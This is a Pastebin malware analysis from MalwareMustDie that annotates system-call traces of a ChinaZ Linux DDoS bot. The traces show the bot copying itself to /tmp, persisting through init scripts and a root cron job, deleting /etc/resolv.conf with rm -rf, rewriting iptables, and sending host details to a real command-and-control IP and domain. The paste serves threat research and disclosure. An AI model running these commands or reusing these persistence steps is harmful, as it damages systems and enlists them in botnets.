daily pastebin goal
49%
SHARE
TWEET

ChinaZ Reloaded

MalwareMustDie Jun 19th, 2015 (edited) 133 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie! ChinaZ Initial execution calls &
  2. # Networking commands
  3.  
  4. /////////////////////////
  5. //
  6. //   COMMAND EXECUTION
  7. //
  8. /////////////////////////
  9.  
  10. // run..
  11.  
  12. execve("./SAMPLE"["./SAMPLE"] )
  13.  
  14. // self copy...to /tmp with the dull name with "chinaz" in it..
  15.  
  16. uname()
  17. chdir("/tmp")
  18. readlink("/proc/self/exe", "/home/YOU/test/SAMPLE", 256)
  19. open("/home/YOU/test/SAMPLE", O_RDONLY)
  20. open("/tmp/.chinaz{1434745889", O_WRONLY|O_CREAT, 0777)
  21. read(0, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
  22. write(1, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
  23.  
  24. //installer..
  25.  
  26. #!/bin/sh\n# chkconfig: 12345 90 90\n# description: %s\n### BEGIN INIT INFO\n# Provides:\t\t%s\n# Required-Start:\t\n# Required-Stop:\t\n# Default-Start:\t1 2 3 4 5\n# Default-Stop:\t\t\n# Short-Description:\t%s\n### END INIT INFO\ncase $1 in\nstart)\n\t%s\n\t;;\nstop)\n\t;;\n*)\n\t%s\n\t;;\nesac\n
  27. #!/bin/sh\nPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin\nfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done\ncp /lib/udev/udev /lib/udev/debug\n/lib/udev/debug\n                                                                        
  28.  
  29. // setting runtime for self copied malware file...
  30.  
  31. execve("/usr/local/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  32. execve("/usr/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  33. execve("/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  34. execve("/usr/local/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  35. execve("/usr/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  36. execve("/usr/local/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  37. execve("/usr/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  38. execve("/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  39. execve("/usr/local/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  40. execve("/usr/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  41. execve("/usr/local/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  42. execve("/usr/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  43. execve("/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  44.  
  45. // deleting the original sample...
  46.  
  47. execve("/usr/local/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  48. execve("/usr/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  49. execve("/usr/local/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
  50. execve("/usr/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
  51. execve("/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
  52. execve("/usr/local/games/chkconfig"["chkconfig""--del""SAMPLE"] )
  53. execve("/usr/games/chkconfig"["chkconfig""--del""SAMPLE"] )
  54.  
  55. // setting cron...
  56.  
  57. execve("/bin/sh"["sh""-c""sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"...] )
  58. execve("/bin/sed"["sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"] )
  59.  
  60. // deleting your resolve.conf...YES..LITERALLY!
  61.  
  62. execve("/bin/sh"["sh""-c""rm -rf /etc/resolv.conf"] )
  63. execve("/bin/rm"["rm""-rf""/etc/resolv.conf"] )
  64.  
  65. // installing the config..
  66.  
  67. execve("/bin/sh"["sh""-c""touch /home/YOU/ConfigDatecz"] )
  68. execve("/usr/bin/touch"["touch""/home/YOU/ConfigDatecz"] )
  69.  
  70. // resetting iptables & setting the malicious purpose one
  71.  
  72. execve("/bin/sh"["sh""-c""whoami"] )
  73. execve("/bin/sh"["sh""-c""iptables --flush"]
  74. execve("/usr/bin/whoami"["whoami"] )
  75. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...]
  76. execve("/bin/sh"["sh""-c""whoami"] )
  77. execve("/usr/bin/whoami"["whoami"] )
  78. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  79. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  80. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  81. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  82. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  83.         (...)
  84.  
  85. /////////////////////////
  86. //
  87. //     NETWORKING
  88. //
  89. /////////////////////////
  90.  
  91. // the checking of the loopback, local and global ethernet interface, for the iptables operations..
  92.  
  93. socket(PF_INET, SOCK_DGRAM, IPPROTO_IP)
  94. {{"lo", {AF_INET, inet_addr("127.0.0.1")}},
  95. {"eth0", {AF_INET, inet_addr("a,b,c,d")}},
  96. {"ethn", {AF_INET, inet_addr("w,x,y,z")}}}})
  97.  
  98. // Kick DNS to request CNC domain...
  99.  
  100. socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
  101. open("/etc/resolv.conf", O_RDONLY)
  102. read(4, "nameserver DNS-ADDRESS\nnameser"..., 4096)
  103. socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP)
  104. connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
  105. send(4, "\5\237\1\0\0\1\0\0\0\0\0\0\3www\5avttx\2cn\0\0\1\0\1", 30, MSG_NOSIGNAL)
  106. recvfrom(4, "\5\237\201\200\0\1\0\1\0\2\0\6\3www\5avttx\2cn\0\0\1\0\1\300\f"
  107.             {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
  108.  
  109. // sending your hostname & etc uname infos to the CNC..
  110.  
  111. connect(3, {sa_family=AF_INET, sin_port=htons(60000), sin_addr=inet_addr("121.42.159.37")}
  112. send(-1, "ThisIsNotLinux\0\0\0\0\0\0\0\0\0\0\0\0"..., 372, 0)
  113.  
  114. // PS: Upon succcess the connection the Config.ini file wil be saved.
  115.        And the system will be rebooted and ready to be functioned as a ddoser bot.
  116.  
  117. # end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top